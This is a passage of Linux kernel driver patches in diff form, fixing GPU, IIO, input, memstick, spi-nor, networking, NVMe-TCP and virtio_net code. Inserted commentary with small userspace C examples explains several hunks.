+diff --git a/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c b/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
+index 8cecf81a5ae03..3c05ce01f73b8 100644
+--- a/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
++++ b/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
+@@ -840,6 +840,8 @@ static void vop2_enable(struct vop2 *vop2)
+ 		return;
+ 	}
+ 
++	regcache_sync(vop2->map);
++
+ 	if (vop2->data->soc_id == 3566)
+ 		vop2_writel(vop2, RK3568_OTP_WIN_EN, 1);
+ 
+@@ -868,6 +870,8 @@ static void vop2_disable(struct vop2 *vop2)
+ 
+ 	pm_runtime_put_sync(vop2->dev);
+ 
++	regcache_mark_dirty(vop2->map);
++
+ 	clk_disable_unprepare(vop2->aclk);
+ 	clk_disable_unprepare(vop2->hclk);
+ }
+diff --git a/drivers/gpu/drm/tests/drm_buddy_test.c b/drivers/gpu/drm/tests/drm_buddy_test.c
+index f8ee714df3967..09ee6f6af896b 100644
+--- a/drivers/gpu/drm/tests/drm_buddy_test.c
++++ b/drivers/gpu/drm/tests/drm_buddy_test.c
+@@ -89,7 +89,8 @@ static int check_block(struct kunit *test, struct drm_buddy *mm,
+ 		err = -EINVAL;
+ 	}
+ 
+-	if (!is_power_of_2(block_size)) {
++	/* We can't use is_power_of_2() for a u64 on 32-bit systems. */
++	if (block_size & (block_size - 1)) {
+ 		kunit_err(test, "block size not power of two\n");
+ 		err = -EINVAL;
+ 	}
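
The kunit hunk above swaps is_power_of_2() for an open-coded bit test because the kernel helper takes an unsigned long, which truncates a u64 block size on 32-bit targets. The underlying trick, sketched for userspace; note that x & (x - 1) alone treats 0 as a power of two, so a general-purpose check wants the extra nonzero guard:

	#include <stdbool.h>
	#include <stdint.h>
	#include <stdio.h>

	/* Works for any unsigned width; 0 needs an explicit check. */
	static bool is_pow2_u64(uint64_t x)
	{
		return x && (x & (x - 1)) == 0;
	}

	int main(void)
	{
		printf("%d\n", is_pow2_u64(1ULL << 40)); /* 1 */
		printf("%d\n", is_pow2_u64(3ULL << 40)); /* 0 */
		return 0;
	}
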
+diff --git a/drivers/iio/adc/at91-sama5d2_adc.c b/drivers/iio/adc/at91-sama5d2_adc.c
+index ed4f8501bda84..ed4961c29d5f4 100644
+--- a/drivers/iio/adc/at91-sama5d2_adc.c
++++ b/drivers/iio/adc/at91-sama5d2_adc.c
+@@ -1409,7 +1409,7 @@ static struct iio_trigger *at91_adc_allocate_trigger(struct iio_dev *indio,
+ 	trig = devm_iio_trigger_alloc(&indio->dev, "%s-dev%d-%s", indio->name,
+ 				iio_device_id(indio), trigger_name);
+ 	if (!trig)
+-		return NULL;
++		return ERR_PTR(-ENOMEM);
+ 
+ 	trig->dev.parent = indio->dev.parent;
+ 	iio_trigger_set_drvdata(trig, indio);
+diff --git a/drivers/iio/dac/ad5755.c b/drivers/iio/dac/ad5755.c
+index beadfa938d2da..404865e354602 100644
+--- a/drivers/iio/dac/ad5755.c
++++ b/drivers/iio/dac/ad5755.c
+@@ -802,6 +802,7 @@ static struct ad5755_platform_data *ad5755_parse_fw(struct device *dev)
+ 	return pdata;
+ 
+  error_out:
++	fwnode_handle_put(pp);
+ 	devm_kfree(dev, pdata);
+ 	return NULL;
+ }
+diff --git a/drivers/iio/light/tsl2772.c b/drivers/iio/light/tsl2772.c
+index ad50baa0202cc..e823c145f6792 100644
+--- a/drivers/iio/light/tsl2772.c
++++ b/drivers/iio/light/tsl2772.c
+@@ -601,6 +601,7 @@ static int tsl2772_read_prox_diodes(struct tsl2772_chip *chip)
+ 			return -EINVAL;
+ 		}
+ 	}
++	chip->settings.prox_diode = prox_diode_mask;
+ 
+ 	return 0;
+ }
+diff --git a/drivers/input/tablet/pegasus_notetaker.c b/drivers/input/tablet/pegasus_notetaker.c
+index d836d3dcc6a24..a68da2988f9cd 100644
+--- a/drivers/input/tablet/pegasus_notetaker.c
++++ b/drivers/input/tablet/pegasus_notetaker.c
+@@ -296,6 +296,12 @@ static int pegasus_probe(struct usb_interface *intf,
+ 	pegasus->intf = intf;
+ 
+ 	pipe = usb_rcvintpipe(dev, endpoint->bEndpointAddress);
++	/* Sanity check that pipe's type matches endpoint's type */
++	if (usb_pipe_type_check(dev, pipe)) {
++		error = -EINVAL;
++		goto err_free_mem;
++	}
++
+ 	pegasus->data_len = usb_maxpacket(dev, pipe);
+ 
+ 	pegasus->data = usb_alloc_coherent(dev, pegasus->data_len, GFP_KERNEL,
+diff --git a/drivers/input/touchscreen/cyttsp5.c b/drivers/input/touchscreen/cyttsp5.c
+index 4a23d62313825..434a37317cbe5 100644
+--- a/drivers/input/touchscreen/cyttsp5.c
++++ b/drivers/input/touchscreen/cyttsp5.c
+@@ -111,6 +111,7 @@ struct cyttsp5_sensing_conf_data_dev {
+ 	__le16 max_z;
+ 	u8 origin_x;
+ 	u8 origin_y;
++	u8 panel_id;
+ 	u8 btn;
+ 	u8 scan_mode;
+ 	u8 max_num_of_tch_per_refresh_cycle;
+diff --git a/drivers/memstick/core/memstick.c b/drivers/memstick/core/memstick.c
+index 660df7d269fac..d410e2e78a3d3 100644
+--- a/drivers/memstick/core/memstick.c
++++ b/drivers/memstick/core/memstick.c
+@@ -410,6 +410,7 @@ static struct memstick_dev *memstick_alloc_card(struct memstick_host *host)
+ 	return card;
+ err_out:
+ 	host->card = old_card;
++	kfree_const(card->dev.kobj.name);
+ 	kfree(card);
+ 	return NULL;
+ }
+@@ -468,8 +469,10 @@ static void memstick_check(struct work_struct *work)
+ 				put_device(&card->dev);
+ 				host->card = NULL;
+ 			}
+-		} else
++		} else {
++			kfree_const(card->dev.kobj.name);
+ 			kfree(card);
++		}
+ 	}
+ 
+ out_power_off:
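
The memstick hunks above free the kobject name with kfree_const() on the error paths, since dev_set_name() may have duplicated the string on the heap while other names live in .rodata. kfree_const() decides by checking whether the pointer falls inside the kernel's rodata section; the userspace analogue below has no such section test, so it models the decision with an explicit flag instead:

	#include <stdbool.h>
	#include <stdlib.h>
	#include <string.h>

	/* Userspace analogue of kfree_const(): free only heap-allocated names. */
	struct obj_name {
		const char *s;
		bool heap;	/* the kernel infers this from the .rodata range */
	};

	static void name_free(struct obj_name *n)
	{
		if (n->heap)
			free((char *)n->s);
		n->s = NULL;
	}

	int main(void)
	{
		struct obj_name a = { "default", false };
		struct obj_name b = { strdup("card0"), true };

		name_free(&a);	/* no-op for the static name */
		name_free(&b);	/* releases the allocated one */
		return 0;
	}
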
+diff --git a/drivers/mmc/host/sdhci_am654.c b/drivers/mmc/host/sdhci_am654.c
+index 89953093e20c7..672d37ea98d0f 100644
+--- a/drivers/mmc/host/sdhci_am654.c
++++ b/drivers/mmc/host/sdhci_am654.c
+@@ -351,8 +351,6 @@ static void sdhci_am654_write_b(struct sdhci_host *host, u8 val, int reg)
+ 		 */
+ 		case MMC_TIMING_SD_HS:
+ 		case MMC_TIMING_MMC_HS:
+-		case MMC_TIMING_UHS_SDR12:
+-		case MMC_TIMING_UHS_SDR25:
+ 			val &= ~SDHCI_CTRL_HISPD;
+ 		}
+ 	}
+diff --git a/drivers/mtd/spi-nor/core.c b/drivers/mtd/spi-nor/core.c
+index 2ef2660f58180..4244c6fd98111 100644
+--- a/drivers/mtd/spi-nor/core.c
++++ b/drivers/mtd/spi-nor/core.c
+@@ -3344,7 +3344,19 @@ static struct spi_mem_driver spi_nor_driver = {
+ 	.remove = spi_nor_remove,
+ 	.shutdown = spi_nor_shutdown,
+ };
+-module_spi_mem_driver(spi_nor_driver);
++
++static int __init spi_nor_module_init(void)
++{
++	return spi_mem_driver_register(&spi_nor_driver);
++}
++module_init(spi_nor_module_init);
++
++static void __exit spi_nor_module_exit(void)
++{
++	spi_mem_driver_unregister(&spi_nor_driver);
++	spi_nor_debugfs_shutdown();
++}
++module_exit(spi_nor_module_exit);
+ 
+ MODULE_LICENSE("GPL v2");
+ MODULE_AUTHOR("Huang Shijie <shijie8@gmail.com>");
+diff --git a/drivers/mtd/spi-nor/core.h b/drivers/mtd/spi-nor/core.h
+index 958cd143c9346..f4246c52a1def 100644
+--- a/drivers/mtd/spi-nor/core.h
++++ b/drivers/mtd/spi-nor/core.h
+@@ -714,8 +714,10 @@ static inline struct spi_nor *mtd_to_spi_nor(struct mtd_info *mtd)
+ 
+ #ifdef CONFIG_DEBUG_FS
+ void spi_nor_debugfs_register(struct spi_nor *nor);
++void spi_nor_debugfs_shutdown(void);
+ #else
+ static inline void spi_nor_debugfs_register(struct spi_nor *nor) {}
++static inline void spi_nor_debugfs_shutdown(void) {}
+ #endif
+ 
+ #endif /* __LINUX_MTD_SPI_NOR_INTERNAL_H */
+diff --git a/drivers/mtd/spi-nor/debugfs.c b/drivers/mtd/spi-nor/debugfs.c
+index ff895f6758ea1..558ffecf8ae6d 100644
+--- a/drivers/mtd/spi-nor/debugfs.c
++++ b/drivers/mtd/spi-nor/debugfs.c
+@@ -226,13 +226,13 @@ static void spi_nor_debugfs_unregister(void *data)
+ 	nor->debugfs_root = NULL;
+ }
+ 
++static struct dentry *rootdir;
++
+ void spi_nor_debugfs_register(struct spi_nor *nor)
+ {
+-	struct dentry *rootdir, *d;
++	struct dentry *d;
+ 	int ret;
+ 
+-	/* Create rootdir once. Will never be deleted again. */
+-	rootdir = debugfs_lookup(SPI_NOR_DEBUGFS_ROOT, NULL);
+ 	if (!rootdir)
+ 		rootdir = debugfs_create_dir(SPI_NOR_DEBUGFS_ROOT, NULL);
+ 
+@@ -247,3 +247,8 @@ void spi_nor_debugfs_register(struct spi_nor *nor)
+ 	debugfs_create_file("capabilities", 0444, d, nor,
+ 			    &spi_nor_capabilities_fops);
+ }
++
++void spi_nor_debugfs_shutdown(void)
++{
++	debugfs_remove(rootdir);
++}
+diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
+index 415cd95fb140f..ddbf892e9b9ce 100644
+--- a/drivers/net/bonding/bond_main.c
++++ b/drivers/net/bonding/bond_main.c
+@@ -1775,14 +1775,15 @@ void bond_lower_state_changed(struct slave *slave)
+ 
+ /* The bonding driver uses ether_setup() to convert a master bond device
+  * to ARPHRD_ETHER, that resets the target netdevice's flags so we always
+- * have to restore the IFF_MASTER flag, and only restore IFF_SLAVE if it was set
++ * have to restore the IFF_MASTER flag, and only restore IFF_SLAVE and IFF_UP
++ * if they were set
+  */
+ static void bond_ether_setup(struct net_device *bond_dev)
+ {
+-	unsigned int slave_flag = bond_dev->flags & IFF_SLAVE;
++	unsigned int flags = bond_dev->flags & (IFF_SLAVE | IFF_UP);
+ 
+ 	ether_setup(bond_dev);
+-	bond_dev->flags |= IFF_MASTER | slave_flag;
++	bond_dev->flags |= IFF_MASTER | flags;
+ 	bond_dev->priv_flags &= ~IFF_TX_SKB_SHARING;
+ }
+ 
+diff --git a/drivers/net/dsa/b53/b53_mmap.c b/drivers/net/dsa/b53/b53_mmap.c
+index 70887e0aece33..d9434ed9450df 100644
+--- a/drivers/net/dsa/b53/b53_mmap.c
++++ b/drivers/net/dsa/b53/b53_mmap.c
+@@ -216,6 +216,18 @@ static int b53_mmap_write64(struct b53_device *dev, u8 page, u8 reg,
+ 	return 0;
+ }
+ 
++static int b53_mmap_phy_read16(struct b53_device *dev, int addr, int reg,
++			       u16 *value)
++{
++	return -EIO;
++}
++
++static int b53_mmap_phy_write16(struct b53_device *dev, int addr, int reg,
++				u16 value)
++{
++	return -EIO;
++}
++
+ static const struct b53_io_ops b53_mmap_ops = {
+ 	.read8 = b53_mmap_read8,
+ 	.read16 = b53_mmap_read16,
+@@ -227,6 +239,8 @@ static const struct b53_io_ops b53_mmap_ops = {
+ 	.write32 = b53_mmap_write32,
+ 	.write48 = b53_mmap_write48,
+ 	.write64 = b53_mmap_write64,
++	.phy_read16 = b53_mmap_phy_read16,
++	.phy_write16 = b53_mmap_phy_write16,
+ };
+ 
+ static int b53_mmap_probe_of(struct platform_device *pdev,
+diff --git a/drivers/net/dsa/microchip/ksz8795.c b/drivers/net/dsa/microchip/ksz8795.c
+index 3fffd5da8d3b0..ffcad057d0650 100644
+--- a/drivers/net/dsa/microchip/ksz8795.c
++++ b/drivers/net/dsa/microchip/ksz8795.c
+@@ -96,7 +96,7 @@ static int ksz8795_change_mtu(struct ksz_device *dev, int frame_size)
+ 
+ 	if (frame_size > KSZ8_LEGAL_PACKET_SIZE)
+ 		ctrl2 |= SW_LEGAL_PACKET_DISABLE;
+-	else if (frame_size > KSZ8863_NORMAL_PACKET_SIZE)
++	if (frame_size > KSZ8863_NORMAL_PACKET_SIZE)
+ 		ctrl1 |= SW_HUGE_PACKET;
+ 
+ 	ret = ksz_rmw8(dev, REG_SW_CTRL_1, SW_HUGE_PACKET, ctrl1);
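
The ksz8795 hunk above turns an else-if into an independent if: a frame above the legal-packet limit must set the huge-packet bit as well, and chaining the checks made the second one unreachable for large frames. A small illustration with made-up thresholds; LEGAL_MAX and NORMAL_MAX are placeholders, not the real KSZ8 register limits:

	#include <stdbool.h>
	#include <stdio.h>

	#define LEGAL_MAX  2000
	#define NORMAL_MAX 1536

	struct flags { bool legal_disable; bool huge; };

	static struct flags classify(int frame_size)
	{
		struct flags f = { false, false };

		if (frame_size > LEGAL_MAX)
			f.legal_disable = true;
		/* Independent check: an oversized frame must set both bits. */
		if (frame_size > NORMAL_MAX)
			f.huge = true;
		return f;
	}

	int main(void)
	{
		struct flags f = classify(2500);

		/* With else-if this would print huge=0 despite the huge frame. */
		printf("legal_disable=%d huge=%d\n", f.legal_disable, f.huge);
		return 0;
	}
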
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index 015b5848b9583..47617a95034c6 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -2388,7 +2388,7 @@ static int bnxt_async_event_process(struct bnxt *bp,
+ 	case ASYNC_EVENT_CMPL_EVENT_ID_PHC_UPDATE: {
+ 		switch (BNXT_EVENT_PHC_EVENT_TYPE(data1)) {
+ 		case ASYNC_EVENT_CMPL_PHC_UPDATE_EVENT_DATA1_FLAGS_PHC_RTC_UPDATE:
+-			if (bp->fw_cap & BNXT_FW_CAP_PTP_RTC) {
++			if (BNXT_PTP_USE_RTC(bp)) {
+ 				struct bnxt_ptp_cfg *ptp = bp->ptp_cfg;
+ 				u64 ns;
+ 
+@@ -7628,7 +7628,7 @@ static int __bnxt_hwrm_ptp_qcfg(struct bnxt *bp)
+ 	u8 flags;
+ 	int rc;
+ 
+-	if (bp->hwrm_spec_code < 0x10801) {
++	if (bp->hwrm_spec_code < 0x10801 || !BNXT_CHIP_P5_THOR(bp)) {
+ 		rc = -ENODEV;
+ 		goto no_ptp;
+ 	}
+diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_tc_flower.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_tc_flower.c
+index dd9be229819a5..d3541159487dd 100644
+--- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_tc_flower.c
++++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_tc_flower.c
+@@ -1135,7 +1135,7 @@ void cxgb4_cleanup_tc_flower(struct adapter *adap)
+ 		return;
+ 
+ 	if (adap->flower_stats_timer.function)
+-		del_timer_sync(&adap->flower_stats_timer);
++		timer_shutdown_sync(&adap->flower_stats_timer);
+ 	cancel_work_sync(&adap->flower_stats_work);
+ 	rhashtable_destroy(&adap->flower_tbl);
+ 	adap->tc_flower_initialized = false;
+diff --git a/drivers/net/ethernet/intel/e1000e/netdev.c b/drivers/net/ethernet/intel/e1000e/netdev.c
+index 04acd1a992fa2..2146e7a137244 100644
+--- a/drivers/net/ethernet/intel/e1000e/netdev.c
++++ b/drivers/net/ethernet/intel/e1000e/netdev.c
+@@ -5288,31 +5288,6 @@ static void e1000_watchdog_task(struct work_struct *work)
+ 				ew32(TARC(0), tarc0);
+ 			}
+ 
+-			/* disable TSO for pcie and 10/100 speeds, to avoid
+-			 * some hardware issues
+-			 */
+-			if (!(adapter->flags & FLAG_TSO_FORCE)) {
+-				switch (adapter->link_speed) {
+-				case SPEED_10:
+-				case SPEED_100:
+-					e_info("10/100 speed: disabling TSO\n");
+-					netdev->features &= ~NETIF_F_TSO;
+-					netdev->features &= ~NETIF_F_TSO6;
+-					break;
+-				case SPEED_1000:
+-					netdev->features |= NETIF_F_TSO;
+-					netdev->features |= NETIF_F_TSO6;
+-					break;
+-				default:
+-					/* oops */
+-					break;
+-				}
+-				if (hw->mac.type == e1000_pch_spt) {
+-					netdev->features &= ~NETIF_F_TSO;
+-					netdev->features &= ~NETIF_F_TSO6;
+-				}
+-			}
+-
+ 			/* enable transmits in the hardware, need to do this
+ 			 * after setting TARC(0)
+ 			 */
+@@ -7529,6 +7504,32 @@ static int e1000_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 			    NETIF_F_RXCSUM |
+ 			    NETIF_F_HW_CSUM);
+ 
++	/* disable TSO for pcie and 10/100 speeds to avoid
++	 * some hardware issues and for i219 to fix transfer
++	 * speed being capped at 60%
++	 */
++	if (!(adapter->flags & FLAG_TSO_FORCE)) {
++		switch (adapter->link_speed) {
++		case SPEED_10:
++		case SPEED_100:
++			e_info("10/100 speed: disabling TSO\n");
++			netdev->features &= ~NETIF_F_TSO;
++			netdev->features &= ~NETIF_F_TSO6;
++			break;
++		case SPEED_1000:
++			netdev->features |= NETIF_F_TSO;
++			netdev->features |= NETIF_F_TSO6;
++			break;
++		default:
++			/* oops */
++			break;
++		}
++		if (hw->mac.type == e1000_pch_spt) {
++			netdev->features &= ~NETIF_F_TSO;
++			netdev->features &= ~NETIF_F_TSO6;
++		}
++	}
++
+ 	/* Set user-changeable features (subset of all device features) */
+ 	netdev->hw_features = netdev->features;
+ 	netdev->hw_features |= NETIF_F_RXFCS;
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
+index 8328139db3795..3ac7234a85bbb 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_main.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_main.c
+@@ -11059,8 +11059,11 @@ static void i40e_rebuild(struct i40e_pf *pf, bool reinit, bool lock_acquired)
+ 					     pf->hw.aq.asq_last_status));
+ 	}
+ 	/* reinit the misc interrupt */
+-	if (pf->flags & I40E_FLAG_MSIX_ENABLED)
++	if (pf->flags & I40E_FLAG_MSIX_ENABLED) {
+ 		ret = i40e_setup_misc_vector(pf);
++		if (ret)
++			goto end_unlock;
++	}
+ 
+ 	/* Add a filter to drop all Flow control frames from any VSI from being
+ 	 * transmitted. By doing so we stop a malicious VF from sending out
+@@ -14125,15 +14128,15 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 		vsi->id = ctxt.vsi_number;
+ 	}
+ 
+-	vsi->active_filters = 0;
+-	clear_bit(__I40E_VSI_OVERFLOW_PROMISC, vsi->state);
+ 	spin_lock_bh(&vsi->mac_filter_hash_lock);
++	vsi->active_filters = 0;
+ 	/* If macvlan filters already exist, force them to get loaded */
+ 	hash_for_each_safe(vsi->mac_filter_hash, bkt, h, f, hlist) {
+ 		f->state = I40E_FILTER_NEW;
+ 		f_count++;
+ 	}
+ 	spin_unlock_bh(&vsi->mac_filter_hash_lock);
++	clear_bit(__I40E_VSI_OVERFLOW_PROMISC, vsi->state);
+ 
+ 	if (f_count) {
+ 		vsi->flags |= I40E_VSI_FLAG_FILTER_CHANGED;
+diff --git a/drivers/net/ethernet/mellanox/mlxfw/mlxfw_mfa2_tlv_multi.c b/drivers/net/ethernet/mellanox/mlxfw/mlxfw_mfa2_tlv_multi.c
+index 017d68f1e1232..972c571b41587 100644
+--- a/drivers/net/ethernet/mellanox/mlxfw/mlxfw_mfa2_tlv_multi.c
++++ b/drivers/net/ethernet/mellanox/mlxfw/mlxfw_mfa2_tlv_multi.c
+@@ -31,6 +31,8 @@ mlxfw_mfa2_tlv_next(const struct mlxfw_mfa2_file *mfa2_file,
+ 
+ 	if (tlv->type == MLXFW_MFA2_TLV_MULTI_PART) {
+ 		multi = mlxfw_mfa2_tlv_multi_get(mfa2_file, tlv);
++		if (!multi)
++			return NULL;
+ 		tlv_len = NLA_ALIGN(tlv_len + be16_to_cpu(multi->total_len));
+ 	}
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/pci_hw.h b/drivers/net/ethernet/mellanox/mlxsw/pci_hw.h
+index 48dbfea0a2a1d..7cdf0ce24f288 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/pci_hw.h
++++ b/drivers/net/ethernet/mellanox/mlxsw/pci_hw.h
+@@ -26,7 +26,7 @@
+ #define MLXSW_PCI_CIR_TIMEOUT_MSECS		1000
+ 
+ #define MLXSW_PCI_SW_RESET_TIMEOUT_MSECS	900000
+-#define MLXSW_PCI_SW_RESET_WAIT_MSECS		200
++#define MLXSW_PCI_SW_RESET_WAIT_MSECS		400
+ #define MLXSW_PCI_FW_READY			0xA1844
+ #define MLXSW_PCI_FW_READY_MASK			0xFFFF
+ #define MLXSW_PCI_FW_READY_MAGIC		0x5E
+diff --git a/drivers/net/ethernet/sfc/efx.c b/drivers/net/ethernet/sfc/efx.c
+index 6a1bff54bc6c3..e6aedd8ebd750 100644
+--- a/drivers/net/ethernet/sfc/efx.c
++++ b/drivers/net/ethernet/sfc/efx.c
+@@ -541,7 +541,6 @@ int efx_net_open(struct net_device *net_dev)
+ 	else
+ 		efx->state = STATE_NET_UP;
+ 
+-	efx_selftest_async_start(efx);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/ethernet/sfc/efx_common.c b/drivers/net/ethernet/sfc/efx_common.c
+index cc30524c2fe45..361687de308dc 100644
+--- a/drivers/net/ethernet/sfc/efx_common.c
++++ b/drivers/net/ethernet/sfc/efx_common.c
+@@ -544,6 +544,8 @@ void efx_start_all(struct efx_nic *efx)
+ 	/* Start the hardware monitor if there is one */
+ 	efx_start_monitor(efx);
+ 
++	efx_selftest_async_start(efx);
++
+ 	/* Link state detection is normally event-driven; we have
+ 	 * to poll now because we could have missed a change
+ 	 */
+diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
+index 61e33e4dd0cd6..0644069592211 100644
+--- a/drivers/net/virtio_net.c
++++ b/drivers/net/virtio_net.c
+@@ -728,8 +728,13 @@ static struct page *xdp_linearize_page(struct receive_queue *rq,
+ 				       int page_off,
+ 				       unsigned int *len)
+ {
+-	struct page *page = alloc_page(GFP_ATOMIC);
++	int tailroom = SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
++	struct page *page;
+ 
++	if (page_off + *len + tailroom > PAGE_SIZE)
++		return NULL;
++
++	page = alloc_page(GFP_ATOMIC);
+ 	if (!page)
+ 		return NULL;
+ 
+@@ -737,7 +742,6 @@ static struct page *xdp_linearize_page(struct receive_queue *rq,
+ 	page_off += *len;
+ 
+ 	while (--*num_buf) {
+-		int tailroom = SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
+ 		unsigned int buflen;
+ 		void *buf;
+ 		int off;
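
The virtio_net hunk above rejects an XDP linearization up front when offset, length, and skb_shared_info tailroom cannot fit in one page, rather than allocating first and overrunning later. A toy version of the bounds check; TAILROOM is a stand-in for SKB_DATA_ALIGN(sizeof(struct skb_shared_info)), which is architecture-dependent:

	#include <stdio.h>

	#define PAGE_SIZE 4096
	#define TAILROOM  320	/* illustrative value only */

	/* Reject up front anything that cannot fit with its tailroom. */
	static int linearize_fits(unsigned int page_off, unsigned int len)
	{
		return page_off + len + TAILROOM <= PAGE_SIZE;
	}

	int main(void)
	{
		printf("%d\n", linearize_fits(0, 3000)); /* 1: fits */
		printf("%d\n", linearize_fits(0, 4000)); /* 0: would overrun */
		return 0;
	}
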
+diff --git a/drivers/net/wireless/ath/ath9k/mci.c b/drivers/net/wireless/ath/ath9k/mci.c
+index 3363fc4e89661..a0845002d6fe3 100644
+--- a/drivers/net/wireless/ath/ath9k/mci.c
++++ b/drivers/net/wireless/ath/ath9k/mci.c
+@@ -646,9 +646,7 @@ void ath9k_mci_update_wlan_channels(struct ath_softc *sc, bool allow_all)
+ 	struct ath_hw *ah = sc->sc_ah;
+ 	struct ath9k_hw_mci *mci = &ah->btcoex_hw.mci;
+ 	struct ath9k_channel *chan = ah->curchan;
+-	static const u32 channelmap[] = {
+-		0x00000000, 0xffff0000, 0xffffffff, 0x7fffffff
+-	};
++	u32 channelmap[] = {0x00000000, 0xffff0000, 0xffffffff, 0x7fffffff};
+ 	int i;
+ 	s16 chan_start, chan_end;
+ 	u16 wlan_chan;
+diff --git a/drivers/net/xen-netback/netback.c b/drivers/net/xen-netback/netback.c
+index 5c266062c08f0..c35c085dbc877 100644
+--- a/drivers/net/xen-netback/netback.c
++++ b/drivers/net/xen-netback/netback.c
+@@ -996,10 +996,8 @@ static void xenvif_tx_build_gops(struct xenvif_queue *queue,
+ 
+ 		/* No crossing a page as the payload mustn't fragment. */
+ 		if (unlikely((txreq.offset + txreq.size) > XEN_PAGE_SIZE)) {
+-			netdev_err(queue->vif->dev,
+-				   "txreq.offset: %u, size: %u, end: %lu\n",
+-				   txreq.offset, txreq.size,
+-				   (unsigned long)(txreq.offset&~XEN_PAGE_MASK) + txreq.size);
++			netdev_err(queue->vif->dev, "Cross page boundary, txreq.offset: %u, size: %u\n",
++				   txreq.offset, txreq.size);
+ 			xenvif_fatal_tx_err(queue->vif);
+ 			break;
+ 		}
+diff --git a/drivers/nvme/host/tcp.c b/drivers/nvme/host/tcp.c
+index 1ca52ac163c2f..2c15412649bab 100644
+--- a/drivers/nvme/host/tcp.c
++++ b/drivers/nvme/host/tcp.c
+@@ -1605,22 +1605,7 @@ static int nvme_tcp_alloc_queue(struct nvme_ctrl *nctrl, int qid)
+ 	if (ret)
+ 		goto err_init_connect;
+ 
+-	queue->rd_enabled = true;
+ 	set_bit(NVME_TCP_Q_ALLOCATED, &queue->flags);
+-	nvme_tcp_init_recv_ctx(queue);
+-
+-	write_lock_bh(&queue->sock->sk->sk_callback_lock);
+-	queue->sock->sk->sk_user_data = queue;
+-	queue->state_change = queue->sock->sk->sk_state_change;
+-	queue->data_ready = queue->sock->sk->sk_data_ready;
+-	queue->write_space = queue->sock->sk->sk_write_space;
+-	queue->sock->sk->sk_data_ready = nvme_tcp_data_ready;
+-	queue->sock->sk->sk_state_change = nvme_tcp_state_change;
+-	queue->sock->sk->sk_write_space = nvme_tcp_write_space;
+-#ifdef CONFIG_NET_RX_BUSY_POLL
+-	queue->sock->sk->sk_ll_usec = 1;
+-#endif
+-	write_unlock_bh(&queue->sock->sk->sk_callback_lock);
+ 
+ 	return 0;
+ 
+@@ -1640,7 +1625,7 @@ err_destroy_mutex:
+ 	return ret;
+ }
+ 
+-static void nvme_tcp_restore_sock_calls(struct nvme_tcp_queue *queue)
++static void nvme_tcp_restore_sock_ops(struct nvme_tcp_queue *queue)
+ {
+ 	struct socket *sock = queue->sock;
+ 
+@@ -1655,7 +1640,7 @@ static void nvme_tcp_restore_sock_calls(struct nvme_tcp_queue *queue)
+ static void __nvme_tcp_stop_queue(struct nvme_tcp_queue *queue)
+ {
+ 	kernel_sock_shutdown(queue->sock, SHUT_RDWR);
+-	nvme_tcp_restore_sock_calls(queue);
++	nvme_tcp_restore_sock_ops(queue);
+ 	cancel_work_sync(&queue->io_work);
+ }
+ 
+@@ -1673,21 +1658,42 @@ static void nvme_tcp_stop_queue(struct nvme_ctrl *nctrl, int qid)
+ 	mutex_unlock(&queue->queue_lock);
+ }
+ 
++static void nvme_tcp_setup_sock_ops(struct nvme_tcp_queue *queue)
++{
++	write_lock_bh(&queue->sock->sk->sk_callback_lock);
++	queue->sock->sk->sk_user_data = queue;
++	queue->state_change = queue->sock->sk->sk_state_change;
++	queue->data_ready = queue->sock->sk->sk_data_ready;
++	queue->write_space = queue->sock->sk->sk_write_space;
++	queue->sock->sk->sk_data_ready = nvme_tcp_data_ready;
++	queue->sock->sk->sk_state_change = nvme_tcp_state_change;
++	queue->sock->sk->sk_write_space = nvme_tcp_write_space;
++#ifdef CONFIG_NET_RX_BUSY_POLL
++	queue->sock->sk->sk_ll_usec = 1;
++#endif
++	write_unlock_bh(&queue->sock->sk->sk_callback_lock);
++}
++
+ static int nvme_tcp_start_queue(struct nvme_ctrl *nctrl, int idx)
+ {
+ 	struct nvme_tcp_ctrl *ctrl = to_tcp_ctrl(nctrl);
++	struct nvme_tcp_queue *queue = &ctrl->queues[idx];
+ 	int ret;
+ 
++	queue->rd_enabled = true;
++	nvme_tcp_init_recv_ctx(queue);
++	nvme_tcp_setup_sock_ops(queue);
++
+ 	if (idx)
+ 		ret = nvmf_connect_io_queue(nctrl, idx);
+ 	else
+ 		ret = nvmf_connect_admin_queue(nctrl);
+ 
+ 	if (!ret) {
+-		set_bit(NVME_TCP_Q_LIVE, &ctrl->queues[idx].flags);
++		set_bit(NVME_TCP_Q_LIVE, &queue->flags);
+ 	} else {
+-		if (test_bit(NVME_TCP_Q_ALLOCATED, &ctrl->queues[idx].flags))
+-			__nvme_tcp_stop_queue(&ctrl->queues[idx]);
++		if (test_bit(NVME_TCP_Q_ALLOCATED, &queue->flags))
++			__nvme_tcp_stop_queue(queue);
+ 		dev_err(nctrl->device,
+ 			"failed to connect queue: %d ret=%d\n", idx, ret);
+ 	}
+diff --git a/drivers/pci/msi/msi.c b/drivers/pci/msi/msi.c
+index 1f716624ca563..ef1d8857a51ba 100644
+--- a/drivers/pci/msi/msi.c
++++ b/drivers/pci/msi/msi.c
+@@ -750,8 +750,7 @@ out_disable:
+ 	return ret;
+ }
+ 
